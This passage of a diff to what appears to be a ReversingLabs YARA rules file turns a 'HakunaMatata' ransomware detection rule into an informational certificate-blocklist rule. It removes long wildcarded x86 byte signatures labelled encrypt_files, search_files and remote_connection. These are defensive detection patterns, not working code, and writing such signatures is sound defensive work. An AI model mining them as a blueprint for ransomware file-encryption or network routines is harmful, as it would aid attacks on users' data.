+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11956-L11972"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e363ff93fce286d60a3f5ea20ba3ec03564b7a5321c3f6448cc82187f23e8a9f"
+		logic_hash = "c5f6372a207d02283840e745619e93194d954eedff7bae34aadcb645b1cb78fc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HakunaMatata"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ??
-            85 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 89 14 24 89 C1 E8 ??
-            ?? ?? ?? 83 EC ?? 84 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B
-            45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83
-            EC ?? 85 C0 0F 95 C0 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? 8B
-            45 ?? 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 54 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 50 ?? 89 D0 C1 E0 ??
-            01 D0 01 C0 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ??
-            ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24
-            A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8B 45 ?? 8B 40 ?? BA ?? ?? ?? ?? 8B 4D ?? 8B 5D ?? 39 DA 72 ?? 39 DA 77 ??
-            39 C8 76 ?? 89 C8 89 DA 89 45 ?? 8B 55 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4D ??
-            89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ??
-            83 F8 ?? 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 45 ?? 89 4C 24 ?? 89
-            54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 C6 8B 45 ?? 89 C1 BB
-            ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 CF 31 C7 89 7D ?? 89 DF 31 D7 89 7D ?? 8B 45 ?? 0B
-            45 ?? 85 C0 0F 94 C0 0F B6 C8 8B 55 ?? 8B 45 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 89
-            F0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24
-            A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? A1 ?? ?? ?? ?? FF D0 89 45 ?? 8B 45 ?? 85 C0
-            79 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ??
-            8D 4D ?? 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0
-            83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? 90 EB ?? 8B 4D ?? 8B 5D ??
-            8B 45 ?? BA ?? ?? ?? ?? 29 C1 19 D3 89 C8 89 DA 89 45 ?? 89 55 ?? 8B 45 ?? BA ?? ??
-            ?? ?? 01 45 ?? 11 55 ?? 8B 45 ?? 8B 55 ?? 89 C6 83 F6 ?? 89 75 ?? 89 D0 80 F4 ?? 89
-            45 ?? 8B 55 ?? 8B 4D ?? 89 C8 09 D0 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            8B 45 ?? 85 C0 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B 45 ??
-            89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89
-            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ??
-            ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83
-            EC ?? 8B 45 ?? 8D 65 ?? 5B 5E 5F 5D C2
-        }
-		$encrypt_files_2 = {
-            55 89 E5 56 53 81 EC ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 89 85
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 85 C0 0F 84 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC ?? 84 C0 0F 84 ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF
-            D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89
-            44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 95 C0 84 C0 0F 84
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ??
-            8B 85 ?? ?? ?? ?? 80 F4 ?? 89 C3 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 C6 89 F0 09 D8 85 C0
-            74 ?? 8B 45 ?? 8B 55 ?? 3B 95 ?? ?? ?? ?? 72 ?? 3B 95 ?? ?? ?? ?? 77 ?? 3B 85 ?? ??
-            ?? ?? 76 ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 40 ??
-            89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 8B 55 ?? 89 44 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 50 ?? 89 D0 C1 E0 ?? 01 D0 01 C0 89
-            45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89
-            44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ??
-            FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
-            ?? 8B 40 ?? BA ?? ?? ?? ?? 8B 4D ?? 8B 5D ?? 39 DA 72 ?? 39 DA 77 ?? 39 C8 76 ?? 89
-            C8 89 DA 89 45 ?? 8B 4D ?? 8B 55 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 89
-            4C 24 ?? 89 54 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 F8 ?? 0F 94
-            C0 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 45 ?? 89 4C 24 ?? 89 54 24 ?? 89 04
-            24 E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 C1 BB ?? ?? ?? ?? 8B 45 ?? 8B 55 ??
-            89 CE 31 C6 89 B5 ?? ?? ?? ?? 89 DE 31 D6 89 B5 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B B5
-            ?? ?? ?? ?? 89 D8 09 F0 85 C0 0F 94 C0 88 45 ?? 8B 55 ?? 0F B6 4D ?? 8B 5D ?? 8B 45
-            ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? A1 ?? ?? ??
-            ?? FF D0 89 45 ?? 8B 45 ?? 85 C0 79 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ??
-            8B 55 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 45
-            ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ??
-            ?? ?? 90 EB ?? 8B 4D ?? 8B 5D ?? 8B 45 ?? BA ?? ?? ?? ?? 29 C1 19 D3 89 C8 89 DA 89
-            45 ?? 89 55 ?? 8B 45 ?? BA ?? ?? ?? ?? 01 45 ?? 11 55 ?? 8B 45 ?? 8B 55 ?? 89 C6 83
-            F6 ?? 89 B5 ?? ?? ?? ?? 89 D0 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B B5 ??
-            ?? ?? ?? 89 F0 09 D8 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 9D ??
-            ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 F0 09 D8 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 2B
-            45 ?? 1B 55 ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 40 ?? 89 C1 BB ?? ?? ?? ?? 8B 45 ?? 8B
-            55 ?? 39 D3 72 ?? 39 D3 77 ?? 39 C1 76 ?? 89 C1 89 D3 89 4D ?? 8B 45 ?? C7 44 24 ??
-            ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24
-            A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 F8 ?? 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B
-            45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4D ?? 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ??
-            89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ??
-            ?? EB ?? 8B 45 ?? 8B 55 ?? 8B 4D ?? BB ?? ?? ?? ?? 29 C8 19 DA 89 45 ?? 89 55 ?? 8B
-            45 ?? 8B 55 ?? 89 C3 80 F7 ?? 89 9D ?? ?? ?? ?? 89 D0 80 F4 ?? 89 85 ?? ?? ?? ?? 8B
-            9D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 F0 09 D8 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ??
-            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B
-            45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8
-            ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ??
-            FF D0 83 EC ?? 8B 45 ?? 8D 65 ?? 5B 5E 5D C2
-        }
-		$search_files = {
-            E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 95 C0 88 45 ?? 80 7D ?? ?? 74 ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ??
-            83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 83 45 ?? ?? EB ?? A1 ??
-            ?? ?? ?? FF D0 89 C3 C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
-            04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 89 1C 24 89 C1 E8 ?? ?? ?? ?? 83 EC
-            ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8
-            ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 8B 45 ?? 89
-            C1 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 89 D9 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            89 1C 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8
-            ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 89 C1
-            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 90 8D 85
-            ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 95
-            C0 84 C0 74 ?? E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? FF D0 89 C3 C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 89 1C 24 89 C1 E8 ?? ??
-            ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ??
-            ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7
-            04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
-            ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 05 ??
-            ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0
-            74 ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 C2 8B 85 ?? ?? ?? ?? 89 14 24 89 C1
-            E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            89 C2 8B 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8
-            ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
-        }
-		$search_files_2 = {
-            FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 89 C3 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 81 C2 ?? ?? ?? ?? 8B 42 ??
-            83 E0 ?? 83 C8 ?? 89 42 ?? 89 1C 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 C3 8B
-            00 89 DA 03 50 ?? 8B 42 ?? 83 E0 ?? 83 C8 ?? 89 42 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ??
-            ?? ?? 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ??
-            ?? 83 EC ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BB ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ??
-            89 04 24 89 D9 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
-            04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8
-        }
-		$remote_connection = {
-            55 89 E5 53 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 44 24 ?? C7
-            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F0 ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8
-            ?? ?? ?? ?? 8B 45 ?? 8B 00 89 45 ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 8D 45
-            ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
-            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 45 ?? 83 7D ?? ?? 74 ?? 81 7D ?? ?? ??
-            ?? ?? 75 ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 39 45 ?? 77 ?? 8D 45 ??
-            89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 8D 45 ?? 8D 4D ?? 89 4C 24 ?? 89 14 24 89 C1 E8
-            ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8D 50 ?? 8D 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC
-            ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 83 45 ?? ?? 83 45 ??
-            ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 81 7D ?? ?? ?? ?? ?? 75 ?? E9 ??
-            ?? ?? ?? 8D 45 ?? 83 C0 ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 8B 45 ??
-            05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 50 ?? 8D 45 ?? 89 04 24 89 D1 E8
-            ?? ?? ?? ?? 83 EC ?? 8B 45 ?? 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 90 8D 45 ?? 89
-            C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89
-            C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 89 D8 89 04 24 E8 ?? ??
-            ?? ?? 90 8B 5D ?? C9 C2
-        }
-		$remote_connection_2 = {
-            55 89 E5 57 56 53 83 EC ?? 89 4D ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 45 ?? 89 44 24 ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 03 89 45 ?? EB ?? 83 EC ?? 89 45 ?? 85 C0 74 ?? 3D ?? ??
-            ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89
-            44 24 ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 83 7D ?? ??
-            74 ?? BE ?? ?? ?? ?? 8D 7D ?? EB ?? 83 EC ?? 8D 45 ?? 89 04 24 8D 4D ?? E8 ?? ?? ??
-            ?? 83 EC ?? 8B 45 ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C6 ?? 39 75 ?? 72 ?? 8B
-            45 ?? 8B 5C B0 ?? 89 7D ?? B8 ?? ?? ?? ?? 85 DB 74 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 04
-            43 C6 44 24 ?? ?? 89 44 24 ?? 89 1C 24 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 83 EC ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? C1 F8 ?? 69 C0 ?? ?? ??
-            ?? 85 C0 74 ?? 8B 7D ?? 8D 9F ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 47 ?? 3B 47 ??
-            74 ?? 85 C0 74 ?? 8B 55 ?? 89 10 8D 48 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ??
-            8B 45 ?? 83 40 ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 8D 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 83 EC ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2
-        }
-		$encrypt_files_3 = {
-            55 57 56 53 83 EC ?? 8B 41 ?? 85 C0 75 ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
-            ?? BE ?? ?? ?? ?? 89 F0 83 C4 ?? 5B 5E 5F 5D C2 ?? ?? 89 CB C7 44 24 ?? ?? ?? ?? ??
-            8D 54 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 FF
-            15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C7 BE ?? ??
-            ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ??
-            ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C2 89 44 24 ??
-            83 F8 ?? 74 ?? 8D 44 24 ?? 89 44 24 ?? 89 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85
-            C0 75 ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ??
-            83 EC ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 F6 0F 84 ?? ?? ?? ?? 8B
-            84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 89 44 24 ?? 89 54 24 ?? 8B 43 ?? 89 04
-            24 E8 ?? ?? ?? ?? 89 44 24 ?? 8B 73 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24
-            E8 ?? ?? ?? ?? 8D 04 B6 01 C0 89 44 24 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C5 C7 44 24 ??
-            ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89
-            44 24 ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24
-            ?? 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 89 7C 24 ?? 89 C6 89 D7 89 5C 24 ?? E9
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? 89 5C 24 ?? 8B 44 24 ??
-            89 44 24 ?? 8B 4C 24 ?? 89 0C 24 FF 54 24 ?? 83 EC ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 89
-            5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? C7
